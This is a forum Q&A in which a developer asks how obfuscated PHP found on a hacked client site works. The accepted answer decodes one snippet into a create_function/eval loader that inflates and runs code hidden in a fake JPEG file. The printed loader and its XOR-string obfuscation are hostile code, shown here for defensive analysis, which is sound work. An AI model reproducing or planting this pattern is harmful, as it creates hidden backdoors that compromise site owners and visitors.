# PHP 302 Redirect virus/hack found, need help to decipher

Tags: php

A client recently came to me with an issue where their website would redirect to different websites against their wishes.  The culprit turned out to be the following snippet:

```
//  $wp_ac_remote_retrieve_header = ',S7<f-NH9;%.KM7kF0^L2&1YzYJM.>RB,|Mu"C_@}H2#HEFGKSI 5<K8]M"97Z)GM&FbN%CAKL1/Z:JUOD3!9-!.<B0?9kCNWBQ~~k1U7,7i~&>8<(R<NE<^Zb0>2,EQ]R/SS%wSSD!yN,;"#/T$d/>&b|a^v' ^ "I%VPNm)2PUCB*9RC Y2)mAT-%:%#Z[<6_ToZJ,2%R*^B<1i!*> LL^>K4#GJD9L)9C4L-J.n&5PK7S\$z#-QSX_HKOm`wi.;-2.~.6;t-TI[F-N_JYL}y=&T;(MtYUo*?)3F=6WX;6(Q&<IWCWF;JJ_PA@UHwM";
//  $get_ho_tag_template = 'cr atDW"ufb4)j.'|'!"E!`%HDTl#pHoJ';
//  $start_hg_wp = $get_ho_tag_template(null,$wp_ac_remote_retrieve_header);
//  $start_hg_wp();
```

And apparently this is not the first time they have been hacked, as I also found the following snippet commented out:

```
//  $comment_zr_date = 'J4UCmj82"&6D?XQz/_F;kB<:#L,FYR<*+vMYS"87tW8OE# B8>LDS=R+ HI<=8S#G5VG@Q;jM^]@5F<(B+5n_DW6L,CX@Nr=h2X:_MKaq-*FOOXH;>^)+FV90%a7qyg^N3*DVQCT7:MvJkKU' ^ '/B4/E*_HKHP(^,4RI6*^4%YN|/C(-7R^X^ov;MUR[0W=!LN$LNc"2P;GY*<OTV6P4V3)44ID.10oX?]L/B[A3-5D-^*=3a"u8w Y:!d19}o>,*4ghV?[N"yv|`Ng!*H7#RM!farz]J*TcBbn';
//  $get_spe_footer = "<=:Q.0(CEVO!8=J" ^ "_O_0ZUw%08,UQR\$";
//  $wp_olw_rss = $get_spe_footer(null,$comment_zr_date);
//  $wp_olw_rss();
```

There are no other references to any of these functions/variables.  Or at least none that turn up when I do a sitewide search.  Also, the file's permissions had been changed to read only.

Any idea as to how they are accomplishing this? Or how the above code functions/works?  When removed, the issue/hack disappears completely.  However, as this is their 3rd time encountering this issue, I believe that they have left themselves open somewhere. As a note, this is not a WP site.

** EDIT

File was to large to include, here is a link:

http://pastebin.com/1XyJg4S3

If you run this through a base64 decoder, you get:

http://pastebin.com/JMHtqskM

However, I am unable to decipher it any further.  There appears to be either more encoding or...?

Comment: I can't answer your question, but I'd love to know why the down-votes.  There may not be enough information here to answer the question, but it could be a known vulnerability that someone here could easily recognize.

Comment: Can I assume that when "live" these were _not_ commented out? As for the PHP code, they are creating a function (unknown to me if machine code or some kind of bytecode), using it as a boot loader to create a larger function, and then running that. The names appear to be quasi-random. And yes, they must have a security hole somewhere in their site that permits a bad guy to insert code. Be sure to check for back doors and Trojans, too.

Comment: Also interested in the downvotes - or the close votes, this question is in no way too broad. The poster needs help deciphering 4 lines of code.

Comment: The problem lies not in those 4 lines but in the unsecure application that allows their injection. We can not help on that application as we have no info on it, hence the down votes.

Comment: ToBe: You're correct. Without knowledge about the system it's impossible to locate the cause of the hack. Checking out https://www.owasp.org/index.php/PHP_Security_Cheat_Sheet is highly recommended. At this point we can't even say if the source of the  security leak (or one of the leaks) is to found in PHP.

Comment: Any/all information would be helpful.  I am curious to know where the vulnerability is, but I realize that most answers would be guesswork.  However, I am still interested in knowing how the above code works.

Answer (score 5, accepted):

It's some kind of interesting obfuscation.

```
echo $comment_zr_date;
```

gives:

```
eval(@gzinflate(file_get_contents("/home/gordonftp/familybusinesscenter.com/myadmin/libraries/PHPExcel/PHPExcel/Shared/OLE/PPS/image001.jpg")));
```

And

```
echo $get_spe_footer;
```

Gives:

```
create_function
```

The obfuscation works by using bitwise operators on two string (thanks tot Populus for the hint). See also [PHP strange bitwise operator impact on strings](https://stackoverflow.com/questions/6390593/php-strange-bitwise-operator-impact-on-strings)

In cleartext php it says:

```
$comment_zr_date = 'eval(@gzinflate(file_get_contents("/home/gordonftp/familybusinesscenter.com/myadmin/libraries/PHPExcel/PHPExcel/Shared/OLE/PPS/image001.jpg")))';
$get_spe_footer = 'create_function';

// execute the function
$wp_olw_rss = $get_spe_footer(null,$comment_zr_date);
$wp_olw_rss();
```

Further evaluation is possible after you post the contents of

```
@gzinflate(file_get_contents("/home/gordonftp/familybusinesscenter.com/myadmin/libraries/PHPExcel/PHPExcel/Shared/OLE/PPS/image001.jpg"))
```

Comment: PHPExcel is a open source library. Im not aware of any hole in that one though? https://phpexcel.codeplex.com/

Comment: Just because the file is there, does not mean the exploit is there. Just that a malicious person put an image there. The image001.jpg probably did not come with phpexcel.

Comment: It's a simple "obfuscation" technique: get 2 strings, bit-and or bit-or or bit-xor...etc. them together produces another string that makes perfect sense, seemingly out of thin air :P

Comment: Check. The bitwise operator escaped my attention. Updated the answer.

Comment: @Arend I have added the contents you requested.

Comment: @DanielBrown can you put it on pastebin.com so we don't have to download it?

Comment: @AdamHopkinson I modified my question above to include the original request in a pastebin, as well as a base64 decode of it.